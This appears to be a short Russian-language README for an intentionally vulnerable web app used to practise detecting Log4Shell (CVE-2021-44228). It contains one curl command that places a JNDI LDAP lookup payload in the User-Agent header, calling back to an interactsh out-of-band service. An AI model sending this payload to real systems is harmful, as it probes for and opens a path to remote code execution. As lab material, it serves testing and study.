
Простое веб-приложение, уязвимое к Log4Shell (CVE-2021-44228)
Приложение логирует заголовок 'User-Agent', поэтому можно проверить уязвимость с помощью curl и, например, interactsh-service:
curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/
Должна появиться DNS-взаимодействие на app.interactsh.com.
Ссылка на Docker hub